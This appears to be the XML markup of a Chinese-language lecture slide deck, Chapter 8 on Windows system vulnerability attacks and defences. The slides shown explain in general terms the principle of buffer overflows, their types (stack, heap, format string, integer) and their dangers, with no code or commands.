            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678737" y="5883275"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{48A87A34-81AB-432B-8DAE-1953F412C126}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:pPr/>
              <a:t>3/28/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="5883275"/>
            <a:ext cx="6672887" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10514011" y="5883275"/>
            <a:ext cx="764215" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6D22F896-40B5-4ADD-8801-0D06FADFA09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6" r:id="rId12"/>
    <p:sldLayoutId id="2147483663" r:id="rId13"/>
    <p:sldLayoutId id="2147483667" r:id="rId14"/>
    <p:sldLayoutId id="2147483668" r:id="rId15"/>
    <p:sldLayoutId id="2147483658" r:id="rId16"/>
    <p:sldLayoutId id="2147483659" r:id="rId17"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">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tx1"/>
        </a:buClr>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tx1"/>
        </a:buClr>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tx1"/>
        </a:buClr>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zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>indows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞攻击与防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>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xmlns="" val="5184992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8.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出的基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击的目的在于扰乱具有某些特权运行的程序的功能。这样可以让攻击者取得程序的控制权，如果该程序具有足够的权限，那么整个主机就被控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>达到这个目的，攻击者必须达到如下的两个要求：在程序的地址空间里安排适当的代码；通过适当地初始化寄存器和存储器，让程序跳转到安排好的地址空间执行，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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025" name="Picture 1" descr="未命名-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863787" y="4244196"/>
            <a:ext cx="2463800" cy="2044700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4534306" y="6288896"/>
            <a:ext cx="3122762" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出的基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="13984588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8.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出的基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>据统计，直接或间接通过缓冲区溢出进行的攻击占了所有系统攻击总数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>％以上，造成溢出的原因就是程序没有仔细检查用户输入的参数。一般情况下，超出缓冲区长度的数据内容如果覆盖其它数据区是没有意义的，只能造成应用程序的错误，但如果输入的数据是精心设计的，覆盖的数据恰恰是攻击者的植入代码，那么攻击者可能获得系统控制权限。缓冲区被溢出后的效果如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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1339443" y="5791199"/>
            <a:ext cx="4330700" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出后系统报错</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2049" name="Picture 1" descr="001035877"/>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041494" y="4249705"/>
            <a:ext cx="5054318" cy="1541493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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2051" name="Picture 3" descr="10171950_QibJ"/>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6866392" y="3848215"/>
            <a:ext cx="4411208" cy="2689242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866392" y="6537457"/>
            <a:ext cx="4411208" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出后获得系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="14909808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8.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据攻击原理及方式的不同，可以将缓冲区溢出漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>格式化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>整型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>变量溢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="167864031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8.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4327006"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出是最主流、攻击力最强、也是最不稳定的一种溢出类型。因为栈的大小在编译时就被硬编码了，而程序没有检查被加工数据的正确性，所以栈溢出常常发生。攻击力最强是因为栈溢出攻击成功可以同时满足攻击所需要的所有条件，包括植入恶意代码、改变程序执行流程等。不稳定是因为栈中的自动缓冲区周围是返回地址，改写它们将允许攻击者把程序控制权传递给任意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、堆溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果程序中请求开辟一定大小的动态内存，则在内存的堆区会分配一块大小合适的区域给程序代码使用。许多程序员总是先分配固定大小的缓冲区，然后再定义要用的内存的大小，并且常常忘记正确处理没有足够内存的情形，这就有可能产生堆溢出。但堆溢出攻击实施的难度较大，因为攻击者即使能够成功溢出堆缓冲区也很难改变程序的执行流程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="117536208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8.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4327006"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、格式化字符串漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式化字符串漏洞是近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年来出现的，其根源在于未对用户提供的输入信息进行验证。在大多数编程语言中，格式化信息由格式化字符串来表示，而格式化字符串用一种功能有限的数据处理语言来进行描述，从而使描述输出的格式变得相对简单。但作为格式化字符串的数据来自于不可信用户，因此攻击者可以依照数据处理语言的格式来编写输入字符串。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序中，格式化字符串攻击可以用于向任意内存地址写入数据，并且不会改变邻接内存块的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、整形变量溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整形变量溢出条件通常依赖于隐含的类型转换，整形变量溢出造成的影响，小到程序崩溃以及逻辑错误，大到权限提升以及任意代码的执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="162734606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8.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的危害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击比其他一些黑客攻击手段更具有破坏力和隐蔽性，这种攻击很容易使服务程序停止运行，服务器死机甚至删除服务器上的数据。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中，攻击者利用缓冲区溢出获得一个普通用户权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，再通过环境欺骗等手段进行权限提升，从而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>权限的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，达到完全控制目标主机的目的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="19922984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8.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的危害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4344259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要表现在下面几点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
